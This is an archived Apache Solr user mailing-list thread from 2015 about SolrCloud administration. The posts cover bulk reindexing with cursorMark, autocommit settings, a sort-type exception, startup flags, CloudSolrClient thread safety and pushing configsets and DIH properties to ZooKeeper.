> >> >>> Thanks
> >> >>>
> >> >>> Ravi Kiran Bhaskar
> >> >>
> >> >>
> >>
> >>
>


Re: bulk reindexing 5.3.0 issue

2015-09-25 Thread Ravi Solr
Thank you for taking the time to help me out. Yes, I was not using cursorMark; I
will try that next. This is what I was doing. It's a bit shabby coding, but
what can I say, my brain was fried :-) FYI this is a side process just to
correct a messed-up string. The actual indexing process was working all the
time, as our business owners are a bit petulant about stopping indexing. My
autocommit conf and code are given below; as you can see, autocommit should
fire every 100 docs anyway


<autoCommit>
   <maxDocs>100</maxDocs>
   <maxTime>12</maxTime>
</autoCommit>

<autoSoftCommit>
   <maxTime>3</maxTime>
</autoSoftCommit>

private static void processDocs() {

try {
CloudSolrClient client = new
CloudSolrClient("zk1:,zk2:,zk3.com:");
client.setDefaultCollection("collection1");

//First initialize docs
SolrDocumentList docList = getDocs(client, 100);
Long count = 0L;

while (docList != null && docList.size() > 0) {

List<SolrInputDocument> inList = new
ArrayList<SolrInputDocument>();
for(SolrDocument doc : docList) {

SolrInputDocument iDoc =
ClientUtils.toSolrInputDocument(doc);

//This is my SOLR's Unique id
String uniqueId = (String)
iDoc.getFieldValue("uniqueId");

/*
 * This is another system's id which is what I want to
correct. Was messed
 * because of script transformer in DIH import via
SolrEntityProcessor
 * ex-
sun.org.mozilla.javascript.internal.NativeString:9cdef726-05dd-40b7-b1b2-c9bbce96741f
 */
String uuid = (String) iDoc.getFieldValue("uuid");
String sanitizedUUID =
uuid.replace("sun.org.mozilla.javascript.internal.NativeString:", "");
Map<String,String> fieldModifier = new
HashMap<String,String>(1);
fieldModifier.put("set",sanitizedUUID);
iDoc.setField("uuid", fieldModifier);

inList.add(iDoc);
log.info("added " + uniqueId);
}

client.add(inList);

count = count + docList.size();
log.info("Indexed " + count + "/" + docList.getNumFound());

Thread.sleep(5000);

docList = getDocs(client, docList.size());
log.info("Got Docs- " + docList.getNumFound());
}

} catch (Exception e) {
log.error("Error indexing ", e);
}
}

private static SolrDocumentList getDocs(CloudSolrClient client, Integer
rows) {


SolrQuery q = new SolrQuery("*:*");
q.setSort("publishtime", ORDER.desc);
q.setStart(0);
q.setRows(rows);
q.addFilterQuery(new String[] {"uuid:[* TO *]",
"uuid:sun.org.mozilla*"});
q.setFields(new String[]{"uniqueId","uuid"});
SolrDocumentList docList = null;
QueryResponse resp;
try {
resp = client.query(q);
docList = resp.getResults();
} catch (Exception e) {
log.error("Error querying " + q.toString(), e);
}
return docList;
}


Thanks

Ravi Kiran Bhaskar

On Fri, Sep 25, 2015 at 10:58 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Wait, query again how? You've got to have something that keeps you
> from getting the same 100 docs back so you have to be sorting somehow.
> Or you have a high water mark. Or something. Waiting 5 seconds for any
> commit also doesn't really make sense to me. I mean how do you know
>
> 1> that you're going to get a commit (did you explicitly send one from
> the client?).
> 2> all autowarming will be complete by the time the next query hits?
>
> Let's see the query you fire. There has to be some kind of marker that
> you're using to know when you've gotten through the entire set.
>
> And I would use much larger batches, I usually update in batches of
> 1,000 (excepting if these are very large docs of course). I suspect
> you're spending a lot more time sleeping than you need to. I wouldn't
> sleep at all in fact. This is one (rare) case I might consider
> committing from the client. If you specify the wait for searcher param
> (server.commit(true, true), then it doesn't return until a new
> searcher is completely opened so your previous updates will be
> reflected in your next search.
>
> Actually, what I'd really do is
> 1> turn off all auto commits
> 2> go ahead and query/change/update. But the query bits would be using
> the cursormark.
> 3> do NOT commit
> 4> issue a commit when you were all done.
>
> I bet you'd get through your update a lot faster.
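>
> A minimal sketch of that flow (assuming a CloudSolrClient named "client",
> autocommits commented out in solrconfig.xml, and your uniqueId/uuid fields):
>
> SolrQuery q = new SolrQuery("uuid:sun.org.mozilla*")
> .setRows(1000)
> .addSort("uniqueId", ORDER.asc)
> .setFields("uniqueId", "uuid");
> String cursorMark = CursorMarkParams.CURSOR_MARK_START;
> boolean done = false;
> while (!done) {
> // exact same query every pass; only the cursor mark changes
> q.set(CursorMarkParams.CURSOR_MARK_PARAM, cursorMark);
> QueryResponse resp = client.query(q);
> // ... build the atomic "set" updates and client.add(...) them here ...
> String next = resp.getNextCursorMark();
> done = cursorMark.equals(next); // the cursor stops advancing after the last page
> cursorMark = next;
> }
> client.commit(true, true); // one commit at the very end, waiting for the new searcher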

Weird Exception

2015-09-23 Thread Ravi Solr
  (qtp1256054824-13) [c:collection1
s:shard1 r:core_node2 x:collection1_shard1_replica4] o.a.s.c.S.Request
[collection1_shard1_replica4] webapp=/solr path=/select
params={sort=_docid_+asc=*:*=false=javabin=2=0}
status=500 QTime=1
2015-09-24 01:43:33.668 ERROR (qtp1256054824-13) [c:collection1
s:shard1 r:core_node2 x:collection1_shard1_replica4]
o.a.s.s.SolrDispatchFilter null:java.lang.IllegalStateException: Type
mismatch: pubdatetime was indexed with multiple values per document,
use SORTED_SET instead
at 
org.apache.lucene.uninverting.FieldCacheImpl$SortedDocValuesCache.createValue(FieldCacheImpl.java:679)
at 
org.apache.lucene.uninverting.FieldCacheImpl$Cache.get(FieldCacheImpl.java:190)
at 
org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:647)
at 
org.apache.lucene.uninverting.FieldCacheImpl.getTermsIndex(FieldCacheImpl.java:627)
at 
org.apache.lucene.uninverting.UninvertingReader.getSortedDocValues(UninvertingReader.java:257)
at 
org.apache.lucene.index.MultiDocValues.getSortedValues(MultiDocValues.java:316)
at 
org.apache.lucene.index.SlowCompositeReaderWrapper.getSortedDocValues(SlowCompositeReaderWrapper.java:125)
at org.apache.lucene.index.DocValues.getSortedSet(DocValues.java:304)
at 
org.apache.solr.search.function.OrdFieldSource.getValues(OrdFieldSource.java:99)
at 
org.apache.lucene.queries.function.FunctionQuery$AllScorer.<init>(FunctionQuery.java:116)
at 
org.apache.lucene.queries.function.FunctionQuery$FunctionWeight.scorer(FunctionQuery.java:93)
at org.apache.lucene.search.BooleanWeight.scorer(BooleanWeight.java:274)
at org.apache.lucene.search.Weight.bulkScorer(Weight.java:135)
at 
org.apache.lucene.search.BooleanWeight.bulkScorer(BooleanWeight.java:256)
at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:769)
at org.apache.lucene.search.IndexSearcher.search(IndexSearcher.java:486)
at 
org.apache.solr.search.SolrIndexSearcher.buildAndRunCollectorChain(SolrIndexSearcher.java:200)
at 
org.apache.solr.search.SolrIndexSearcher.getDocListNC(SolrIndexSearcher.java:1682)
at 
org.apache.solr.search.SolrIndexSearcher.getDocListC(SolrIndexSearcher.java:1501)
at 
org.apache.solr.search.SolrIndexSearcher.search(SolrIndexSearcher.java:555)
at 
org.apache.solr.handler.component.QueryComponent.process(QueryComponent.java:522)
at 
org.apache.solr.handler.component.SearchHandler.handleRequestBody(SearchHandler.java:277)
at 
org.apache.solr.handler.RequestHandlerBase.handleRequest(RequestHandlerBase.java:143)
at org.apache.solr.core.SolrCore.execute(SolrCore.java:2068)
at org.apache.solr.servlet.HttpSolrCall.execute(HttpSolrCall.java:669)
at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:462)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:210)
at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:179)
at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1652)
at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:585)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:143)
at 
org.eclipse.jetty.security.SecurityHandler.handle(SecurityHandler.java:577)
at 
org.eclipse.jetty.server.session.SessionHandler.doHandle(SessionHandler.java:223)
at 
org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1127)
at 
org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:515)
at 
org.eclipse.jetty.server.session.SessionHandler.doScope(SessionHandler.java:185)
at 
org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1061)
at 
org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:141)
at 
org.eclipse.jetty.server.handler.ContextHandlerCollection.handle(ContextHandlerCollection.java:215)
at 
org.eclipse.jetty.server.handler.HandlerCollection.handle(HandlerCollection.java:110)
at 
org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:97)
at org.eclipse.jetty.server.Server.handle(Server.java:499)
at org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:310)
at 
org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:257)
at 
org.eclipse.jetty.io.AbstractConnection$2.run(AbstractConnection.java:540)
at 
org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:635)
at 
org.eclipse.jetty.util.thread.QueuedThreadPool$3.run(QueuedThreadPool.java:555)
at java.lang.Thread.run(Thread.java:745)


Re: SolrCloud Startup question

2015-09-22 Thread Ravi Solr
Thanks Anshum

On Mon, Sep 21, 2015 at 6:23 PM, Anshum Gupta <ans...@anshumgupta.net>
wrote:

> CloudSolrClient is thread safe and it is highly recommended you reuse the
> client.
>
> If you are providing an HttpClient instance while constructing, make sure
> that the HttpClient uses a multi-threaded connection manager.
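>
> For example (a rough sketch using HttpClient 4.x class names, which is what
> SolrJ 5.x builds against -- adjust the sizes to your load):
>
> PoolingHttpClientConnectionManager cm = new PoolingHttpClientConnectionManager();
> cm.setMaxTotal(200); // total connections across all routes
> cm.setDefaultMaxPerRoute(50); // connections per Solr node
> CloseableHttpClient httpClient = HttpClients.custom().setConnectionManager(cm).build();
> CloudSolrClient client = new CloudSolrClient("zk1:2181,zk2:2181,zk3:2181", httpClient);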
>
> On Mon, Sep 21, 2015 at 3:13 PM, Ravi Solr <ravis...@gmail.com> wrote:
>
> > Thank you Anshum & Upayavira.
> >
> > BTW do any of you guys know if CloudSolrClient is ThreadSafe ??
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net>
> > wrote:
> >
> > > Hi Ravi,
> > >
> > > I just tried it out and here's my understanding:
> > >
> > > 1. Starting Solr with -c starts Solr in cloud mode. This is used to
> start
> > > Solr with an embedded zookeeper.
> > > 2. Starting Solr with -z starts Solr in cloud mode, with the zk
> > connection
> > > string you specify. You don't need to explicitly specify -c in this
> case.
> > > The help text there needs a bit of fixing though
> > >
> > > *  -zZooKeeper connection string; only used when running in
> > > SolrCloud mode using -c*
> > > *   To launch an embedded ZooKeeper instance, don't
> pass
> > > this parameter.*
> > >
> > > *"only used when running in SolrCloud mode using -c" *needs to be
> > rephrased
> > > or removed. Can you create a JIRA for the same?
> > >
> > >
> > > On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com
> > > <javascript:;>> wrote:
> > >
> > > > Can somebody kindly help me understand the difference between the
> > > following
> > > > startup calls ?
> > > >
> > > > ./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> > > >
> > > > Vs
> > > >
> > > > ./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> > > >
> > > > What happens if i don't pass the "-c" option ?? I read the
> > documentation
> > > > but got more confused, I do run a ZK ensemble of 3 instances.  FYI my
> > > cloud
> > > > seems to work fine and the Admin UI shows Cloud graph just fine, but
> I
> > > want
> > > > to just make sure I am doing the right thing and not missing any
> > nuance.
> > > >
> > > > The following is from the documentation on cwiki.
> > > > ---
> > > >
> > > > "Start Solr in SolrCloud mode, which will also launch the embedded
> > > > ZooKeeper instance included with Solr.
> > > >
> > > > This option can be shortened to simply -c.
> > > >
> > > > If you are already running a ZooKeeper ensemble that you want to use
> > > > instead of the embedded (single-node) ZooKeeper, you should also pass
> > the
> > > > -z parameter."
> > > >
> > > > -
> > > >
> > > > Thanks
> > > >
> > > > Ravi Kiran Bhaskar
> > > >
> > >
> > >
> > >
> > > --
> > > Anshum Gupta
> > >
> >
>
>
>
> --
> Anshum Gupta
>


Re: SolrCloud Startup question

2015-09-21 Thread Ravi Solr
Thank you Anshum & Upayavira.

BTW do any of you guys know if CloudSolrClient is ThreadSafe ??

Thanks,

Ravi Kiran Bhaskar

On Monday, September 21, 2015, Anshum Gupta <ans...@anshumgupta.net> wrote:

> Hi Ravi,
>
> I just tried it out and here's my understanding:
>
> 1. Starting Solr with -c starts Solr in cloud mode. This is used to start
> Solr with an embedded zookeeper.
> 2. Starting Solr with -z starts Solr in cloud mode, with the zk connection
> string you specify. You don't need to explicitly specify -c in this case.
> The help text there needs a bit of fixing though
>
> *  -zZooKeeper connection string; only used when running in
> SolrCloud mode using -c*
> *   To launch an embedded ZooKeeper instance, don't pass
> this parameter.*
>
> *"only used when running in SolrCloud mode using -c" *needs to be rephrased
> or removed. Can you create a JIRA for the same?
>
>
> On Mon, Sep 21, 2015 at 1:35 PM, Ravi Solr <ravis...@gmail.com
> <javascript:;>> wrote:
>
> > Can somebody kindly help me understand the difference between the
> following
> > startup calls ?
> >
> > ./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> >
> > Vs
> >
> > ./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181
> >
> > What happens if i don't pass the "-c" option ?? I read the documentation
> > but got more confused, I do run a ZK ensemble of 3 instances.  FYI my
> cloud
> > seems to work fine and the Admin UI shows Cloud graph just fine, but I
> want
> > to just make sure I am doing the right thing and not missing any nuance.
> >
> > The following is from the documentation on cwiki.
> > ---
> >
> > "Start Solr in SolrCloud mode, which will also launch the embedded
> > ZooKeeper instance included with Solr.
> >
> > This option can be shortened to simply -c.
> >
> > If you are already running a ZooKeeper ensemble that you want to use
> > instead of the embedded (single-node) ZooKeeper, you should also pass the
> > -z parameter."
> >
> > -
> >
> > Thanks
> >
> > Ravi Kiran Bhaskar
> >
>
>
>
> --
> Anshum Gupta
>


SolrCloud Startup question

2015-09-21 Thread Ravi Solr
Can somebody kindly help me understand the difference between the following
startup calls ?

./solr start -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181

Vs

./solr start -c -p  -s /solr/home -z zk1:2181,zk2:2181,zk3:2181

What happens if I don't pass the "-c" option? I read the documentation
but got more confused; I do run a ZK ensemble of 3 instances. FYI my cloud
seems to work fine and the Admin UI shows the Cloud graph just fine, but I want
to make sure I am doing the right thing and not missing any nuance.

The following is from the documentation on cwiki.
---

"Start Solr in SolrCloud mode, which will also launch the embedded
ZooKeeper instance included with Solr.

This option can be shortened to simply -c.

If you are already running a ZooKeeper ensemble that you want to use
instead of the embedded (single-node) ZooKeeper, you should also pass the
-z parameter."

-

Thanks

Ravi Kiran Bhaskar


Re: SolrCloud DIH issue

2015-09-20 Thread Ravi Solr
Yes Upayavira, that's exactly what prompted me to ask Erick as soon as I
read https://cwiki.apache.org/confluence/display/solr/Config+Sets

Erick, regarding my delta-import not working: I do see the
dataimport.properties in ZooKeeper after I "upconfig" and "linkconfig" my
conf files into ZK... see below

[zk: localhost: (CONNECTED) 0] ls /configs/xx
[admin-extra.menu-top.html, person-synonyms.txt, entity-stopwords.txt,
protwords.txt, location-synonyms.txt, solrconfig.xml,
organization-synonyms.txt, stopwords.txt, spellings.txt,
dataimport.properties, admin-extra.html, xslt, synonyms.txt, scripts.conf,
subject-synonyms.txt, elevate.xml, admin-extra.menu-bottom.html,
solr-import-config.xml, clustering, schema.xml]

However, when I look into dataimport.properties in my 'conf' folder, it
hasn't been updated even after successfully running a full-import on Sep 19
2015 at 1:00 AM and a subsequent delta-import on Sep 20 2015 at 11 AM, which
did not import newer docs. This prompted me to look into the
dataimport.properties in the conf folder... the details are shown below; you
can clearly see the dates are quite a bit off.

[@y conf]$ cat dataimport.properties
#Tue Sep 15 18:11:17 UTC 2015
reindex-docs.last_index_time=2015-09-15 18\:11\:16
last_index_time=2015-09-15 18\:11\:16
sep.last_index_time=2014-03-24 13\:41\:46


I saw some JIRA tickets about a different location of dataimport.properties
for SolrCloud but couldn't find the path where it is stored... Does anybody
have an idea where it stores it?

Thanks

Ravi Kiran Bhaskar



On Sun, Sep 20, 2015 at 5:28 AM, Upayavira <u...@odoko.co.uk> wrote:

> It is worth noting that the ref guide page on configsets refers to
> non-cloud mode (a useful new feature) whereas people may confuse this
> with configsets in cloud mode,  which use Zookeeper.
>
> Upayavira
>
> On Sun, Sep 20, 2015, at 04:59 AM, Ravi Solr wrote:
> > Cant thank you enough for clarifying it at length. Yeah its pretty
> > confusing even for experienced Solr users. I used the upconfig and
> > linkconfig commands to update 4 collections into zookeeper...As you
> > described, I lucked out as I used the same name for configset and the
> > collection and hence did not have to use the collections API :-)
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> > On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson
> > <erickerick...@gmail.com>
> > wrote:
> >
> > > Let's back up a second. Configsets are what _used_ to be in the conf
> > > directory for each core on a local drive, it's just that they're now
> > > kept up on Zookeeper. Otherwise, you'd have to put them on each
> > > instance in SolrCloud, and bringing up a new replica on a new machine
> > > would look a lot like adding a core with the old core admin API.
> > >
> > > So instead, configurations are kept on zookeeper. A config set
> > > consists of, essentially, a named old-style "conf" directory. There's
> > > no a-priori limit to the number of config sets you can have. Look in
> > > the admin UI, Cloud>>tree>>configs and you'll see each name you've
> > > pushed to ZK. If you explore that tree, you'll see a lot of old
> > > familiar faces, schema.xml, solrconfig.xml, etc.
> > >
> > > So now we come to associating configs with collections. You've
> > > probably done one of the examples where some things happen under the
> > > covers, including explicitly pushing the configset to Zookeeper.
> > > Currently, there's no option in the bin/solr script to push a config,
> > > although I know there's a JIRA to do that.
> > >
> > > So, to put a new config set up you currently need to use the zkCli.sh
> > > script see:
> > >
> https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities,
> > > the "upconfig" command. That pushes the configset up to ZK and gives
> > > it a name.
> > >
> > > Now, you create a collection and it needs a configset stored in ZK.
> > > It's a little tricky in that if you do _not_ explicitly specify a
> > > configest (using the collection.configName parameter to the
> > > collections API CREATE command), then by default it'll look for a
> > > configset with the same name as the collection. If it doesn't find
> > > one, _and_ there is one and only one configset, then it'll use that
> > > one (personally I find that confusing, but that's the way it works).
> > > See: https://cwiki.apache.org/confluence/display/solr/Collections+API
> > >
> > > If you have two or more configsets in ZK, then either the configset
> > > name has to be identical to the collection name (if you don't specify
> > > collection.configName), _or_ you specify collection.configName at
> > > create time.

Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Thanks Erick, I will report back once the reindex is finished. Oh, your
answer reminded me of another question - Regarding configsets the
documentation says

"On a multicore Solr instance, you may find that you want to share
configuration between a number of different cores."

Can the same be used to push disparate, mutually exclusive configs? I ask
this as I have 4 mutually exclusive apps, each with a single-core index, on
a single machine, which I am trying to convert to SolrCloud with a
single-shard approach. Just being lazy and trying to find a way to update and
link configs to ZooKeeper ;-)

Thanks

Ravi Kiran Bhaskar

On Sat, Sep 19, 2015 at 6:54 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Just pushing up the entire configset would be easiest, but the
> Zookeeper command line tools allow you to push up a single
> file if you want.
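>
> e.g. with zkcli.sh, something like this (the putfile command; paths here
> are illustrative):
>
> ./server/scripts/cloud-scripts/zkcli.sh -zkhost zk1:2181 \
> -cmd putfile /configs/sitesearchcore/dataimport.properties ./conf/dataimport.properties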
>
> Yeah, it puzzles me too that the import worked yesterday, not really
> sure what happened, the file shouldn't just disappear
>
> Erick
>
> On Sat, Sep 19, 2015 at 2:46 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Thank you for the prompt response Erick. I did a full-import yesterday,
> you
> > are correct that I did not push dataimport.properties to ZK, should it
> have
> > not worked even for a full import ?. You may be right about 'clean'
> option,
> > I will reindex again today. BTW how do we push a single file to a
> specific
> > config name in zookeeper ?
> >
> >
> > Thanks,
> >
> > Ravi Kiran Bhaskar
> >
> >
> > On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com
> >
> > wrote:
> >
> >> Could not read DIH properties from
> >> /configs/sitesearchcore/dataimport.properties
> >>
> >> This looks like somehow you didn't push this file up to Zookeeper. You
> >> can check what files are there in the admin UI. How you indexed
> >> yesterday is a mystery though, unless somehow this file was removed
> >> from ZK.
> >>
> >> As for why you lost all the docs, my suspicion is that you have the
> >> clean param set up for delta import
> >>
> >> FWIW,
> >> Erick
> >>
> >> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote:
> >> > I am facing a weird problem. As part of upgrade from 4.7.2
> (Master-Slave)
> >> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using
> >> > SolrEntityProcessor yesterday, all of them indexed properly. Today
> >> morning
> >> > I just ran the DIH again with delta import and I lost all docs...what
> am
> >> I
> >> > missing ? Did anybody face similar issue ?
> >> >
> >> > Here are the errors in the logs
> >> >
> >> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was
> >> not
> >> > closed!
> >> > req=waitSearcher=true=
> >>
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> >> > 9/19/2015,
> >> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015,
> 2:41:17 AM
> >> > WARN null ZKPropertiesWriter Could not read DIH properties from
> >> > /configs/sitesearchcore/dataimport.properties :class
> >> > org.apache.zookeeper.KeeperException$NoNodeException
> >> >
> >> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
> >> > = NoNode for /configs/sitesearchcore/dataimport.properties
> >> > at
> >> org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
> >> > at
> >> org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
> >> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
> >> > at
> >> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
> >> > at
> >>
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
> >> > at
> >>
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
> >> > at
> >>
> org.apache.solr.handler.dataimport.DataImporter$1.run(DataImporter.java:461)
> >> >
> >> > 9/19/2015, 11:16:43 AM ERROR null SolrCore Previous SolrRequestInfo
> was
> >> not
> >> > closed!
> >> > req=waitSearcher=true=
> >>
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> >> > 9/19/2015,
> >> > 11:16:43 AM ERROR null SolrCore prev == info : false
> >> >
> >> >
> >> >
> >> > Thanks
> >> >
> >> > Ravi Kiran Bhaskar
> >>
>


Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Can't thank you enough for clarifying it at length. Yeah, it's pretty
confusing even for experienced Solr users. I used the upconfig and
linkconfig commands to update 4 collections into ZooKeeper... As you
described, I lucked out as I used the same name for the configset and the
collection, and hence did not have to use the collections API :-)
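
For the record, the commands were along these lines (zkcli.sh lives under
server/scripts/cloud-scripts; the names and paths here are illustrative):

./zkcli.sh -zkhost zk1:2181 -cmd upconfig -confdir ./collection1/conf -confname collection1
./zkcli.sh -zkhost zk1:2181 -cmd linkconfig -collection collection1 -confname collection1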

Thanks,

Ravi Kiran Bhaskar

On Sat, Sep 19, 2015 at 11:22 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Let's back up a second. Configsets are what _used_ to be in the conf
> directory for each core on a local drive, it's just that they're now
> kept up on Zookeeper. Otherwise, you'd have to put them on each
> instance in SolrCloud, and bringing up a new replica on a new machine
> would look a lot like adding a core with the old core admin API.
>
> So instead, configurations are kept on zookeeper. A config set
> consists of, essentially, a named old-style "conf" directory. There's
> no a-priori limit to the number of config sets you can have. Look in
> the admin UI, Cloud>>tree>>configs and you'll see each name you've
> pushed to ZK. If you explore that tree, you'll see a lot of old
> familiar faces, schema.xml, solrconfig.xml, etc.
>
> So now we come to associating configs with collections. You've
> probably done one of the examples where some things happen under the
> covers, including explicitly pushing the configset to Zookeeper.
> Currently, there's no option in the bin/solr script to push a config,
> although I know there's a JIRA to do that.
>
> So, to put a new config set up you currently need to use the zkCli.sh
> script see:
> https://cwiki.apache.org/confluence/display/solr/Command+Line+Utilities,
> the "upconfig" command. That pushes the configset up to ZK and gives
> it a name.
>
> Now, you create a collection and it needs a configset stored in ZK.
> It's a little tricky in that if you do _not_ explicitly specify a
> configest (using the collection.configName parameter to the
> collections API CREATE command), then by default it'll look for a
> configset with the same name as the collection. If it doesn't find
> one, _and_ there is one and only one configset, then it'll use that
> one (personally I find that confusing, but that's the way it works).
> See: https://cwiki.apache.org/confluence/display/solr/Collections+API
>
> If you have two or more configsets in ZK, then either the configset
> name has to be identical to the collection name (if you don't specify
> collection.configName), _or_ you specify collection.configName at
> create time.
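>
> e.g. (names illustrative):
>
> /admin/collections?action=CREATE&name=mycollection&numShards=1&replicationFactor=2&collection.configName=myconf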
>
> NOTE: there are _no_ config files on the local disk! When a replica of
> a collection loads, it "knows" what collection it's part of and pulls
> the corresponding configset from ZK.
>
> So typically the process is this.
> > you create the config set by editing all the usual suspects, schema.xml,
> solrconfig.xml, DIH config etc.
> > you put those configuration files into some version control system (you
> are using one, right?)
> > you push the configs to Zookeeper
> > you create the collection
> > you figure out you need to change the configs so you
>   > check the code out of your version control
>   > edit them
>   > put the current version back into version control
>   > push the configs up to zookeeper, overwriting the ones already
> there with that name
>   > reload the collection or bounce all the servers. As each replica
> in the collection comes up,
>  it downloads the latest configs from Zookeeper to memory (not to
> disk) and uses them.
>
> Seems like a long drawn-out process, but pretty soon it's automatic.
> And really, the only extra step is the push to Zookeeper, the rest is
> just like old-style cores with the exception that you don't have to
> manually push all the configs to all the machines hosting cores.
>
> Notice that I have mostly avoided talking about "cores" here. Although
> it's true that a replica in a collection is just another core, it's
> "special" in that it has certain very specific properties set. I
> _strongly_ advise you stop thinking about old-style Solr cores and
> instead thing about collections and replicas. And above all, do _not_
> use the admin core API to try to create members of a collection
> (cores), use the collections API to ADDREPLICA/DELETEREPLICA instead.
> Loading/unloading cores is less "fraught", but I try to avoid that too
> and use
>
> Best,
> Erick
>
> On Sat, Sep 19, 2015 at 9:08 PM, Ravi Solr <ravis...@gmail.com> wrote:
> > Thanks Erick, I will report back once the reindex is finished. Oh, your
> > answer reminded me of another question - Regarding configsets the
> > documentation sa

Re: SolrCloud DIH issue

2015-09-19 Thread Ravi Solr
Thank you for the prompt response, Erick. I did a full-import yesterday. You
are correct that I did not push dataimport.properties to ZK; shouldn't it
have worked even for a full import? You may be right about the 'clean'
option; I will reindex again today. BTW, how do we push a single file to a
specific config name in ZooKeeper?


Thanks,

Ravi Kiran Bhaskar


On Sat, Sep 19, 2015 at 1:48 PM, Erick Erickson <erickerick...@gmail.com>
wrote:

> Could not read DIH properties from
> /configs/sitesearchcore/dataimport.properties
>
> This looks like somehow you didn't push this file up to Zookeeper. You
> can check what files are there in the admin UI. How you indexed
> yesterday is a mystery though, unless somehow this file was removed
> from ZK.
>
> As for why you lost all the docs, my suspicion is that you have the
> clean param set up for delta import
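>
> (delta-import defaults to clean=false, so double-check anything that sets
> it explicitly; an illustrative invocation:
> http://localhost:8983/solr/sitesearchcore/dataimport?command=delta-import&clean=false&commit=true)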
>
> FWIW,
> Erick
>
> On Sat, Sep 19, 2015 at 10:36 AM, Ravi Solr <ravis...@gmail.com> wrote:
> > I am facing a weird problem. As part of upgrade from 4.7.2 (Master-Slave)
> > to 5.3.0 (Solrcloud) I re-indexed 1.5 million records via DIH using
> > SolrEntityProcessor yesterday, all of them indexed properly. Today
> morning
> > I just ran the DIH again with delta import and I lost all docs...what am
> I
> > missing ? Did anybody face similar issue ?
> >
> > Here are the errors in the logs
> >
> > 9/19/2015, 2:41:17 AM ERROR null SolrCore Previous SolrRequestInfo was
> not
> > closed!
> > req=waitSearcher=true=
> http://10.128.159.32:8983/solr/sitesearchcore/=FROMLEADER=true=true=javabin=false_end_point=true=2=false
> > 9/19/2015,
> > 2:41:17 AM ERROR null SolrCore prev == info : false 9/19/2015, 2:41:17 AM
> > WARN null ZKPropertiesWriter Could not read DIH properties from
> > /configs/sitesearchcore/dataimport.properties :class
> > org.apache.zookeeper.KeeperException$NoNodeException
> >
> > org.apache.zookeeper.KeeperException$NoNodeException: KeeperErrorCode
> > = NoNode for /configs/sitesearchcore/dataimport.properties
> > at
> org.apache.zookeeper.KeeperException.create(KeeperException.java:111)
> > at
> org.apache.zookeeper.KeeperException.create(KeeperException.java:51)
> > at org.apache.zookeeper.ZooKeeper.getData(ZooKeeper.java:1155)
> > at
> org.apache.solr.common.cloud.SolrZkClient.getData(SolrZkClient.java:349)
> > at
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.readIndexerProperties(ZKPropertiesWriter.java:91)
> > at
> org.apache.solr.handler.dataimport.ZKPropertiesWriter.persist(ZKPropertiesWriter.java:65)
> > at
> org.apache.solr.handler.dataimport.DocBuilder.finish(DocBuilder.java:307)
> > at
> org.apache.solr.handler.dataimport.DocBuilder.execute(DocBuilder.java:253)
> > at
> org.apache.solr.handler.dataimport.DataImporter.doFullImport(DataImporter.java:416)
> > at
> org.apache.solr.handler.dataimport.DataImporter.runCmd(DataImporter.java:480)
> > at
